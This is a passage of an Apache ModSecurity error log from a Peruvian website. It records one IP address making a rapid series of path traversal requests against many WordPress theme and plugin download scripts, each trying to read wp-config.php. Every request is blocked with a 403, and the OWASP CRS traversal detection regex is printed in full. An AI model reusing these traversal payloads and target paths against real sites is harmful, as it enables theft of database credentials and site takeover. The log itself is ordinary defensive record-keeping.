"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/focustelecom/download.php"] [unique_id "Y0ZxZmINFIoIk7hPzpaZOAAAAEg"] [Wed Oct 12 02:48:54.964977 2022] [:error] [pid 22338:tid 140534408505088] [client 185.189.115.30:50070] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/irmahulscher/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/irmahulscher/framework/utilities/download/getfile.php"] [unique_id "Y0ZxZmINFIoIk7hPzpaZOQAAAE4"] [Wed Oct 12 02:48:55.129421 2022] [:error] [pid 22339:tid 140534484039424] [client 185.189.115.30:50072] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/izerski/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/izerski/download.php"] [unique_id "Y0ZxZ9mZws0mEkXxGo-VYAAAAIU"] [Wed Oct 12 02:48:55.280107 2022] [:error] [pid 22972:tid 140534366541568] [client 185.189.115.30:50074] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kioskpolis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kioskpolis/download.php"] [unique_id "Y0ZxZ-LrJ0tgpRmNRAaHuQAAANM"] [Wed Oct 12 02:48:55.433289 2022] [:error] [pid 22339:tid 140534374934272] [client 185.189.115.30:50076] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mantra/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mantra/download.php"] [unique_id "Y0ZxZ9mZws0mEkXxGo-VYQAAAJI"] [Wed Oct 12 02:48:55.585004 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:50078] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/melrose/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/melrose/download.php"] [unique_id "Y0ZxZ-LrJ0tgpRmNRAaHugAAANc"] [Wed Oct 12 02:48:55.742924 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:50080] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtb/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtb/inc/download.php"] [unique_id "Y0ZxZ-LrJ0tgpRmNRAaHuwAAANE"] [Wed Oct 12 02:48:55.894020 2022] [:error] [pid 22339:tid 140534400112384] [client 185.189.115.30:50082] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/niet/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/niet/download.php"] [unique_id "Y0ZxZ9mZws0mEkXxGo-VYgAAAI8"] [Wed Oct 12 02:48:56.045044 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:50084] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippineartawards/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippineartawards/download.php"] [unique_id "Y0ZxaNmZws0mEkXxGo-VYwAAAIg"] [Wed Oct 12 02:48:56.205263 2022] [:error] [pid 22339:tid 140534589232896] [client 185.189.115.30:50086] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quies/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quies/download.php"] [unique_id "Y0ZxaNmZws0mEkXxGo-VZAAAAIE"] [Wed Oct 12 02:48:56.358082 2022] [:error] [pid 22339:tid 140534383326976] [client 185.189.115.30:50088] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salutation/framework/utilities/download/getfile.php"] [unique_id "Y0ZxaNmZws0mEkXxGo-VZQAAAJE"] [Wed Oct 12 02:48:56.508919 2022] [:error] [pid 22339:tid 140534564054784] [client 185.189.115.30:50090] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinitytheme/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinitytheme/lib/downloadlink.php"] [unique_id "Y0ZxaNmZws0mEkXxGo-VZgAAAIQ"] [Wed Oct 12 02:48:56.672200 2022] [:error] [pid 22339:tid 140534349756160] [client 185.189.115.30:50092] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wohwiwebcenter-vdwbayern/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wohwiwebcenter-vdwbayern/download.php"] [unique_id "Y0ZxaNmZws0mEkXxGo-VZwAAAJU"] [Wed Oct 12 02:48:56.869920 2022] [:error] [pid 22339:tid 140534442075904] [client 185.189.115.30:50094] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zeebusiness/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zeebusiness/download.php"] [unique_id "Y0ZxaNmZws0mEkXxGo-VaAAAAIo"] [Wed Oct 12 02:48:57.029430 2022] [:error] [pid 22339:tid 140534358148864] [client 185.189.115.30:50096] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/maronpro/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/maronpro/download.php"] [unique_id "Y0ZxadmZws0mEkXxGo-VaQAAAJQ"] [Wed Oct 12 02:48:57.180322 2022] [:error] [pid 22337:tid 140534433683200] [client 185.189.115.30:50098] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/DolarToday/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/DolarToday/down.php"] [unique_id "Y0ZxaaBKlkjFPqrcdjM3uwAAAAs"] [Wed Oct 12 02:48:57.342985 2022] [:error] [pid 22337:tid 140534374934272] [client 185.189.115.30:50100] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "Y0ZxaaBKlkjFPqrcdjM3vAAAABI"] [Wed Oct 12 02:48:57.509274 2022] [:error] [pid 22339:tid 140534572447488] [client 185.189.115.30:50102] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/green_farming_new/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/green_farming_new/download.php"] [unique_id "Y0ZxadmZws0mEkXxGo-VagAAAIM"] [Wed Oct 12 02:48:57.683378 2022] [:error] [pid 22338:tid 140534425290496] [client 185.189.115.30:50104] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "Y0ZxaWINFIoIk7hPzpaZOgAAAEw"] [Wed Oct 12 02:48:57.834571 2022] [:error] [pid 22972:tid 140534408505088] [client 185.189.115.30:50106] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "Y0ZxaeLrJ0tgpRmNRAaHvAAAAM4"] [Wed Oct 12 02:48:57.997632 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:50108] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "Y0ZxaeLrJ0tgpRmNRAaHvQAAAME"] [Wed Oct 12 02:48:58.151309 2022] [:error] [pid 22972:tid 140534425290496] [client 185.189.115.30:50110] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/RedSteel/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/RedSteel/download.php"] [unique_id "Y0ZxauLrJ0tgpRmNRAaHvgAAAMw"] [Wed Oct 12 02:48:58.302946 2022] [:error] [pid 22972:tid 140534564054784] [client 185.189.115.30:50112] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:mp3 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mp3-jplayer/download.php"] [unique_id "Y0ZxauLrJ0tgpRmNRAaHvwAAAMQ"] [Wed Oct 12 02:48:58.454996 2022] [:error] [pid 22972:tid 140534450468608] [client 185.189.115.30:50114] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SCv1/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] 